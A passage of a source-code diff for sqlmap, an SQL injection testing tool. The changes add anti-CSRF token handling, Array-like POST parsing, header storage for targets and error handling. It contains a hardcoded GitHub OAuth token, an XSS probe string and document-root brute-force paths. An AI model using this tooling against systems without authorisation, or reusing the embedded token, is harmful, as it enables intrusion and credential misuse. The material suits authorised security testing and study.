target = (url, method, data, conf.cookie, None)
|
||||
retVal.add(target)
|
||||
else:
|
||||
errMsg = "there were no forms found at the given target URL"
|
||||
if raise_:
|
||||
|
@ -3403,17 +3519,6 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
|||
|
||||
if addToTargets and retVal:
|
||||
for target in retVal:
|
||||
url = target[0]
|
||||
|
||||
# flag to know if we are dealing with the same target host
|
||||
_ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (response.geturl(), url)))
|
||||
|
||||
if conf.scope:
|
||||
if not re.search(conf.scope, url, re.I):
|
||||
continue
|
||||
elif not _:
|
||||
continue
|
||||
|
||||
kb.targets.add(target)
|
||||
|
||||
return retVal
|
||||
|
|
|
@ -41,6 +41,7 @@ def base64pickle(value):
|
|||
"""
|
||||
|
||||
retVal = None
|
||||
|
||||
try:
|
||||
retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
|
||||
except:
|
||||
|
@ -63,7 +64,14 @@ def base64unpickle(value):
|
|||
'foobar'
|
||||
"""
|
||||
|
||||
return pickle.loads(base64decode(value))
|
||||
retVal = None
|
||||
|
||||
try:
|
||||
retVal = pickle.loads(base64decode(value))
|
||||
except TypeError:
|
||||
retVal = pickle.loads(base64decode(bytes(value)))
|
||||
|
||||
return retVal
|
||||
|
||||
def hexdecode(value):
|
||||
"""
|
||||
|
|
|
@ -207,6 +207,7 @@ POST_HINT_CONTENT_TYPES = {
|
|||
POST_HINT.MULTIPART: "multipart/form-data",
|
||||
POST_HINT.SOAP: "application/soap+xml",
|
||||
POST_HINT.XML: "application/xml",
|
||||
POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
|
||||
}
|
||||
|
||||
DEPRECATED_OPTIONS = {
|
||||
|
|
|
@ -66,13 +66,24 @@ class Dump(object):
|
|||
if kb.get("multiThreadMode"):
|
||||
self._lock.acquire()
|
||||
|
||||
self._outputFP.write(text)
|
||||
try:
|
||||
self._outputFP.write(text)
|
||||
except IOError, ex:
|
||||
errMsg = "error occurred while writing to log file ('%s')" % ex
|
||||
raise SqlmapGenericException(errMsg)
|
||||
|
||||
if kb.get("multiThreadMode"):
|
||||
self._lock.release()
|
||||
|
||||
kb.dataOutputFlag = True
|
||||
|
||||
def flush(self):
|
||||
if self._outputFP:
|
||||
try:
|
||||
self._outputFP.flush()
|
||||
except IOError:
|
||||
pass
|
||||
|
||||
def setOutputFile(self):
|
||||
self._outputFile = os.path.join(conf.outputPath, "log")
|
||||
try:
|
||||
|
@ -380,7 +391,7 @@ class Dump(object):
|
|||
self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
|
||||
return
|
||||
|
||||
dumpDbPath = os.path.join(conf.dumpPath, re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
|
||||
dumpDbPath = os.path.join(conf.dumpPath, re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(db))))
|
||||
|
||||
if conf.dumpFormat == DUMP_FORMAT.SQLITE:
|
||||
replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db)))
|
||||
|
@ -388,7 +399,7 @@ class Dump(object):
|
|||
if not os.path.isdir(dumpDbPath):
|
||||
os.makedirs(dumpDbPath, 0755)
|
||||
|
||||
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))
|
||||
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (normalizeUnicode(unsafeSQLIdentificatorNaming(table)), conf.dumpFormat.lower()))
|
||||
appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop))
|
||||
dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab")
|
||||
|
||||
|
|
|
@ -74,6 +74,7 @@ class POST_HINT:
|
|||
JSON_LIKE = "JSON-like"
|
||||
MULTIPART = "MULTIPART"
|
||||
XML = "XML (generic)"
|
||||
ARRAY_LIKE = "Array-like"
|
||||
|
||||
class HTTPMETHOD:
|
||||
GET = "GET"
|
||||
|
|
|
@ -23,6 +23,9 @@ class SqlmapFilePathException(SqlmapBaseException):
|
|||
class SqlmapGenericException(SqlmapBaseException):
|
||||
pass
|
||||
|
||||
class SqlmapInstallationException(SqlmapBaseException):
|
||||
pass
|
||||
|
||||
class SqlmapMissingDependence(SqlmapBaseException):
|
||||
pass
|
||||
|
||||
|
@ -50,9 +53,15 @@ class SqlmapShellQuitException(SqlmapBaseException):
|
|||
class SqlmapSyntaxException(SqlmapBaseException):
|
||||
pass
|
||||
|
||||
class SqlmapSystemException(SqlmapBaseException):
|
||||
pass
|
||||
|
||||
class SqlmapThreadException(SqlmapBaseException):
|
||||
pass
|
||||
|
||||
class SqlmapTokenException(SqlmapBaseException):
|
||||
pass
|
||||
|
||||
class SqlmapUndefinedMethod(SqlmapBaseException):
|
||||
pass
|
||||
|
||||
|
|
|
@ -84,11 +84,13 @@ from lib.core.enums import WIZARD
|
|||
from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.exception import SqlmapFilePathException
|
||||
from lib.core.exception import SqlmapGenericException
|
||||
from lib.core.exception import SqlmapInstallationException
|
||||
from lib.core.exception import SqlmapMissingDependence
|
||||
from lib.core.exception import SqlmapMissingMandatoryOptionException
|
||||
from lib.core.exception import SqlmapMissingPrivileges
|
||||
from lib.core.exception import SqlmapSilentQuitException
|
||||
from lib.core.exception import SqlmapSyntaxException
|
||||
from lib.core.exception import SqlmapSystemException
|
||||
from lib.core.exception import SqlmapUnsupportedDBMSException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.log import FORMATTER
|
||||
|
@ -106,6 +108,7 @@ from lib.core.settings import DUMMY_URL
|
|||
from lib.core.settings import INJECT_HERE_MARK
|
||||
from lib.core.settings import IS_WIN
|
||||
from lib.core.settings import KB_CHARS_BOUNDARY_CHAR
|
||||
from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET
|
||||
from lib.core.settings import LOCALHOST
|
||||
from lib.core.settings import MAX_CONNECT_RETRIES
|
||||
from lib.core.settings import MAX_NUMBER_OF_THREADS
|
||||
|
@ -219,7 +222,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
|||
|
||||
if not(conf.scope and not re.search(conf.scope, url, re.I)):
|
||||
if not kb.targets or url not in addedTargetUrls:
|
||||
kb.targets.add((url, method, None, cookie))
|
||||
kb.targets.add((url, method, None, cookie, None))
|
||||
addedTargetUrls.add(url)
|
||||
|
||||
def _parseBurpLog(content):
|
||||
|
@ -233,7 +236,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
|||
for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S):
|
||||
port, request = match.groups()
|
||||
request = request.decode("base64")
|
||||
_ = re.search(r"%s:.+" % HTTP_HEADER.HOST, request)
|
||||
_ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request)
|
||||
if _:
|
||||
host = _.group(0).strip()
|
||||
if not re.search(r":\d+\Z", host):
|
||||
|
@ -271,6 +274,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
|||
params = False
|
||||
newline = None
|
||||
lines = request.split('\n')
|
||||
headers = []
|
||||
|
||||
for index in xrange(len(lines)):
|
||||
line = lines[index]
|
||||
|
@ -282,7 +286,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
|||
line = line.strip('\r')
|
||||
match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None
|
||||
|
||||
if len(line) == 0 and method in (HTTPMETHOD.POST, HTTPMETHOD.PUT) and data is None:
|
||||
if len(line) == 0 and method and method != HTTPMETHOD.GET and data is None:
|
||||
data = ""
|
||||
params = True
|
||||
|
||||
|
@ -320,14 +324,14 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
|||
port = filterStringValue(splitValue[1], "[0-9]")
|
||||
|
||||
# Avoid to add a static content length header to
|
||||
# conf.httpHeaders and consider the following lines as
|
||||
# headers and consider the following lines as
|
||||
# POSTed data
|
||||
if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
|
||||
params = True
|
||||
|
||||
# Avoid proxy and connection type related headers
|
||||
elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION):
|
||||
conf.httpHeaders.append((getUnicode(key), getUnicode(value)))
|
||||
headers.append((getUnicode(key), getUnicode(value)))
|
||||
|
||||
if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
|
||||
params = True
|
||||
|
@ -355,12 +359,17 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
|||
|
||||
if not(conf.scope and not re.search(conf.scope, url, re.I)):
|
||||
if not kb.targets or url not in addedTargetUrls:
|
||||
kb.targets.add((url, method, data, cookie))
|
||||
kb.targets.add((url, method, data, cookie, tuple(headers)))
|
||||
addedTargetUrls.add(url)
|
||||
|
||||
fp = openFile(reqFile, "rb")
|
||||
|
||||
content = fp.read()
|
||||
checkFile(reqFile)
|
||||
try:
|
||||
with openFile(reqFile, "rb") as f:
|
||||
content = f.read()
|
||||
except (IOError, OSError, MemoryError), ex:
|
||||
errMsg = "something went wrong while trying "
|
||||
errMsg += "to read the content of file '%s' ('%s')" % (reqFile, ex)
|
||||
raise SqlmapSystemException(errMsg)
|
||||
|
||||
if conf.scope:
|
||||
logger.info("using regular expression '%s' for filtering targets" % conf.scope)
|
||||
|
@ -400,7 +409,13 @@ def _loadQueries():
|
|||
return retVal
|
||||
|
||||
tree = ElementTree()
|
||||
tree.parse(paths.QUERIES_XML)
|
||||
try:
|
||||
tree.parse(paths.QUERIES_XML)
|
||||
except Exception, ex:
|
||||
errMsg = "something seems to be wrong with "
|
||||
errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, ex)
|
||||
errMsg += "sure that you haven't made any changes to it"
|
||||
raise SqlmapInstallationException, errMsg
|
||||
|
||||
for node in tree.findall("*"):
|
||||
queries[node.attrib['value']] = iterate(node)
|
||||
|
@ -560,14 +575,14 @@ def _setGoogleDorking():
|
|||
for link in links:
|
||||
link = urldecode(link)
|
||||
if re.search(r"(.*?)\?(.+)", link):
|
||||
kb.targets.add((link, conf.method, conf.data, conf.cookie))
|
||||
kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
|
||||
elif re.search(URI_INJECTABLE_REGEX, link, re.I):
|
||||
if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork:
|
||||
message = "do you want to scan only results containing GET parameters? [Y/n] "
|
||||
test = readInput(message, default="Y")
|
||||
kb.data.onlyGETs = test.lower() != 'n'
|
||||
if not kb.data.onlyGETs or conf.googleDork:
|
||||
kb.targets.add((link, conf.method, conf.data, conf.cookie))
|
||||
kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
|
||||
|
||||
return links
|
||||
|
||||
|
@ -617,7 +632,7 @@ def _setBulkMultipleTargets():
|
|||
for line in getFileItems(conf.bulkFile):
|
||||
if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line:
|
||||
found = True
|
||||
kb.targets.add((line.strip(), None, None, None))
|
||||
kb.targets.add((line.strip(), None, None, None, None))
|
||||
|
||||
if not found and not conf.forms and not conf.crawlDepth:
|
||||
warnMsg = "no usable links found (with GET parameters)"
|
||||
|
@ -634,7 +649,7 @@ def _setSitemapTargets():
|
|||
for item in parseSitemap(conf.sitemapUrl):
|
||||
if re.match(r"[^ ]+\?(.+)", item, re.I):
|
||||
found = True
|
||||
kb.targets.add((item.strip(), None, None, None))
|
||||
kb.targets.add((item.strip(), None, None, None, None))
|
||||
|
||||
if not found and not conf.forms and not conf.crawlDepth:
|
||||
warnMsg = "no usable links found (with GET parameters)"
|
||||
|
@ -933,13 +948,13 @@ def _setTamperingFunctions():
|
|||
|
||||
try:
|
||||
module = __import__(filename[:-3])
|
||||
except ImportError, msg:
|
||||
except (ImportError, SyntaxError), msg:
|
||||
raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], msg))
|
||||
|
||||
priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__
|
||||
|
||||
for name, function in inspect.getmembers(module, inspect.isfunction):
|
||||
if name == "tamper":
|
||||
if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs":
|
||||
found = True
|
||||
kb.tamperFunctions.append(function)
|
||||
function.func_name = module.__name__
|
||||
|
@ -998,13 +1013,15 @@ def _setWafFunctions():
|
|||
sys.path.insert(0, dirname)
|
||||
|
||||
try:
|
||||
if filename[:-3] in sys.modules:
|
||||
del sys.modules[filename[:-3]]
|
||||
module = __import__(filename[:-3])
|
||||
except ImportError, msg:
|
||||
raise SqlmapSyntaxException("cannot import WAF script '%s' (%s)" % (filename[:-3], msg))
|
||||
|
||||
_ = dict(inspect.getmembers(module))
|
||||
if "detect" not in _:
|
||||
errMsg = "missing function 'detect(page, headers, code)' "
|
||||
errMsg = "missing function 'detect(get_page)' "
|
||||
errMsg += "in WAF script '%s'" % found
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
|
@ -1241,16 +1258,6 @@ def _setHTTPAuthentication():
|
|||
checkFile(key_file)
|
||||
authHandler = HTTPSPKIAuthHandler(key_file)
|
||||
|
||||
def _setHTTPMethod():
|
||||
"""
|
||||
Check and set the HTTP method to perform HTTP requests through.
|
||||
"""
|
||||
|
||||
conf.method = HTTPMETHOD.POST if conf.data is not None else HTTPMETHOD.GET
|
||||
|
||||
debugMsg = "setting the HTTP method to %s" % conf.method
|
||||
logger.debug(debugMsg)
|
||||
|
||||
def _setHTTPExtraHeaders():
|
||||
if conf.headers:
|
||||
debugMsg = "setting extra HTTP headers"
|
||||
|
@ -1640,8 +1647,8 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
|||
|
||||
kb.chars = AttribDict()
|
||||
kb.chars.delimiter = randomStr(length=6, lowercase=True)
|
||||
kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, lowercase=True), KB_CHARS_BOUNDARY_CHAR)
|
||||
kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, lowercase=True), KB_CHARS_BOUNDARY_CHAR)
|
||||
kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
|
||||
kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
|
||||
kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True))
|
||||
|
||||
kb.columnExistsChoice = None
|
||||
|
@ -1736,6 +1743,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
|||
kb.reduceTests = None
|
||||
kb.stickyDBMS = False
|
||||
kb.stickyLevel = None
|
||||
kb.storeCrawlingChoice = None
|
||||
kb.storeHashesChoice = None
|
||||
kb.suppressResumeInfo = False
|
||||
kb.technique = None
|
||||
|
@ -1778,11 +1786,11 @@ def _useWizardInterface():
|
|||
message = "Please enter full target URL (-u): "
|
||||
conf.url = readInput(message, default=None)
|
||||
|
||||
message = "POST data (--data) [Enter for None]: "
|
||||
message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
|
||||
conf.data = readInput(message, default=None)
|
||||
|
||||
if not (filter(lambda _: '=' in unicode(_), (conf.url, conf.data)) or '*' in conf.url):
|
||||
warnMsg = "no GET and/or POST parameter(s) found for testing "
|
||||
warnMsg = "no GET and/or %s parameter(s) found for testing " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
|
||||
warnMsg += "(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). "
|
||||
if not conf.crawlDepth and not conf.forms:
|
||||
warnMsg += "Will search for forms"
|
||||
|
@ -2176,6 +2184,14 @@ def _basicOptionValidation():
|
|||
errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g', '-m' or '-x'"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
if conf.csrfUrl and not conf.csrfToken:
|
||||
errMsg = "option '--csrf-url' requires usage of option '--csrf-token'"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
if conf.csrfToken and conf.threads > 1:
|
||||
errMsg = "option '--csrf-url' is incompatible with option '--threads'"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
if conf.requestFile and conf.url and conf.url != DUMMY_URL:
|
||||
errMsg = "option '-r' is incompatible with option '-u' ('--url')"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
@ -2270,7 +2286,7 @@ def _resolveCrossReferences():
|
|||
lib.controller.checks.setVerbosity = setVerbosity
|
||||
|
||||
def initOptions(inputOptions=AttribDict(), overrideOptions=False):
|
||||
if not inputOptions.disableColoring:
|
||||
if IS_WIN:
|
||||
coloramainit()
|
||||
|
||||
_setConfAttributes()
|
||||
|
@ -2310,7 +2326,6 @@ def init():
|
|||
_setHTTPCookies()
|
||||
_setHTTPReferer()
|
||||
_setHTTPUserAgent()
|
||||
_setHTTPMethod()
|
||||
_setHTTPAuthentication()
|
||||
_setHTTPProxy()
|
||||
_setDNSCache()
|
||||
|
|
|
@ -23,6 +23,7 @@ optDict = {
|
|||
},
|
||||
|
||||
"Request": {
|
||||
"method": "string",
|
||||
"data": "string",
|
||||
"paramDel": "string",
|
||||
"cookie": "string",
|
||||
|
@ -52,6 +53,8 @@ optDict = {
|
|||
"safUrl": "string",
|
||||
"saFreq": "integer",
|
||||
"skipUrlEncode": "boolean",
|
||||
"csrfToken": "string",
|
||||
"csrfUrl": "string",
|
||||
"forceSSL": "boolean",
|
||||
"hpp": "boolean",
|
||||
"evalCode": "string",
|
||||
|
|
|
@ -26,6 +26,7 @@ DESCRIPTION = "automatic SQL injection and database takeover tool"
|
|||
SITE = "http://sqlmap.org"
|
||||
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
|
||||
GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
|
||||
GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
|
||||
ML = "sqlmap-users@lists.sourceforge.net"
|
||||
|
||||
# colorful banner
|
||||
|
@ -33,7 +34,7 @@ BANNER = """\033[01;33m _
|
|||
___ ___| |_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
|
||||
|_ -| . | | | .'| . |
|
||||
|___|_ |_|_|_|_|__,| _|
|
||||
|_| |_| \033[0m\033[4m%s\033[0m\n
|
||||
|_| |_| \033[0m\033[4;37m%s\033[0m\n
|
||||
""" % ((31 + hash(REVISION) % 6) if REVISION else 30, VERSION_STRING.split('/')[-1], SITE)
|
||||
|
||||
# Minimum distance of ratio from kb.matchRatio to result in True
|
||||
|
@ -473,6 +474,9 @@ DEFAULT_COOKIE_DELIMITER = ';'
|
|||
# Unix timestamp used for forcing cookie expiration when provided with --load-cookies
|
||||
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
|
||||
|
||||
# Github OAuth token used for creating an automatic Issue for unhandled exceptions
|
||||
GITHUB_REPORT_OAUTH_TOKEN = "d6c0c7bf3f2298a7b85f82176c46d2f8d494fcc5"
|
||||
|
||||
# Skip unforced HashDB flush requests below the threshold number of cached items
|
||||
HASHDB_FLUSH_THRESHOLD = 32
|
||||
|
||||
|
@ -509,6 +513,9 @@ DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
|
|||
# Alphabet used for heuristic checks
|
||||
HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', '[', ']', ',', '.')
|
||||
|
||||
# String used for dummy XSS check of a tested parameter value
|
||||
DUMMY_XSS_CHECK_APPENDIX = "<'\">"
|
||||
|
||||
# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
|
||||
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
|
||||
|
||||
|
@ -531,7 +538,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
|
|||
CHECK_ZERO_COLUMNS_THRESHOLD = 10
|
||||
|
||||
# Boldify all logger messages containing these "patterns"
|
||||
BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that")
|
||||
BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github")
|
||||
|
||||
# Generic www root directory names
|
||||
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
|
||||
|
@ -543,7 +550,7 @@ MAX_HELP_OPTION_LENGTH = 18
|
|||
MAX_CONNECT_RETRIES = 100
|
||||
|
||||
# Strings for detecting formatting errors
|
||||
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException")
|
||||
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal")
|
||||
|
||||
# Regular expression used for extracting ASP.NET view state values
|
||||
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
|
||||
|
@ -569,6 +576,9 @@ JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+)
|
|||
# Regular expression used for detecting multipart POST data
|
||||
MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name="
|
||||
|
||||
# Regular expression used for detecting Array-like POST data
|
||||
ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\]=.+%s\2\[\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER)
|
||||
|
||||
# Default POST data content-type
|
||||
DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8"
|
||||
|
||||
|
@ -596,6 +606,9 @@ METASPLOIT_SESSION_TIMEOUT = 300
|
|||
# Reference: http://www.cookiecentral.com/faq/#3.5
|
||||
NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
|
||||
|
||||
# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens
|
||||
CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf")
|
||||
|
||||
# Prefixes used in brute force search for web server document root
|
||||
BRUTE_DOC_ROOT_PREFIXES = {
|
||||
OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"),
|
||||
|
@ -611,6 +624,9 @@ BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
|
|||
# Character used as a boundary in kb.chars (preferably less frequent letter)
|
||||
KB_CHARS_BOUNDARY_CHAR = 'q'
|
||||
|
||||
# Letters of lower frequency used in kb.chars
|
||||
KB_CHARS_LOW_FREQUENCY_ALPHABET = "zqxjkvbp"
|
||||
|
||||
# CSS style used in HTML dump format
|
||||
HTML_DUMP_CSS_STYLE = """<style>
|
||||
table{
|
||||
|
|
|
@ -17,6 +17,7 @@ from lib.core.common import Backend
|
|||
from lib.core.common import getUnicode
|
||||
from lib.core.common import hashDBRetrieve
|
||||
from lib.core.common import intersect
|
||||
from lib.core.common import normalizeUnicode
|
||||
from lib.core.common import paramToDict
|
||||
from lib.core.common import readInput
|
||||
from lib.core.common import resetCookieJar
|
||||
|
@ -43,8 +44,11 @@ from lib.core.option import _setDBMS
|
|||
from lib.core.option import _setKnowledgeBaseAttributes
|
||||
from lib.core.option import _setAuthCred
|
||||
from lib.core.settings import ASTERISK_MARKER
|
||||
from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
|
||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||
from lib.core.settings import HOST_ALIASES
|
||||
from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX
|
||||
from lib.core.settings import JSON_RECOGNITION_REGEX
|
||||
from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX
|
||||
from lib.core.settings import MULTIPART_RECOGNITION_REGEX
|
||||
|
@ -132,6 +136,12 @@ def _setRequestParams():
|
|||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
|
||||
if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
|
||||
_ = match.group(2)
|
||||
_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _)
|
||||
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _)
|
||||
conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
|
||||
kb.postHint = POST_HINT.JSON
|
||||
|
||||
elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
|
@ -146,6 +156,17 @@ def _setRequestParams():
|
|||
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
kb.postHint = POST_HINT.JSON_LIKE
|
||||
|
||||
elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
message = "Array-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
test = readInput(message, default="Y")
|
||||
if test and test[0] in ("q", "Q"):
|
||||
raise SqlmapUserQuitException
|
||||
elif test[0] not in ("n", "N"):
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
|
||||
kb.postHint = POST_HINT.ARRAY_LIKE
|
||||
|
||||
elif re.search(XML_RECOGNITION_REGEX, conf.data):
|
||||
message = "SOAP/XML data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
|
@ -325,6 +346,22 @@ def _setRequestParams():
|
|||
errMsg += "within the given request data"
|
||||
raise SqlmapGenericException(errMsg)
|
||||
|
||||
if conf.csrfToken:
|
||||
if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
|
||||
errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
|
||||
errMsg += "found in provided GET, POST, Cookie or header values"
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
|
||||
for parameter in conf.paramDict.get(place, {}):
|
||||
if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
|
||||
message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
|
||||
message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
|
||||
test = readInput(message, default="N")
|
||||
if test and test[0] in ("y", "Y"):
|
||||
conf.csrfToken = parameter
|
||||
break
|
||||
|
||||
def _setHashDB():
|
||||
"""
|
||||
Check and set the HashDB SQLite file for query resume functionality.
|
||||
|
@ -528,8 +565,15 @@ def _createTargetDirs():
|
|||
os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
|
||||
warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
|
||||
logger.warn(warnMsg)
|
||||
except OSError, ex:
|
||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||
except OSError, ex:
|
||||
try:
|
||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||
except IOError, _:
|
||||
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||
errMsg += "Please make sure that your disk is not full and "
|
||||
errMsg += "that you have sufficient write permissions to "
|
||||
errMsg += "create temporary files and/or directories"
|
||||
raise SqlmapGenericException(errMsg)
|
||||
warnMsg = "unable to create regular output directory "
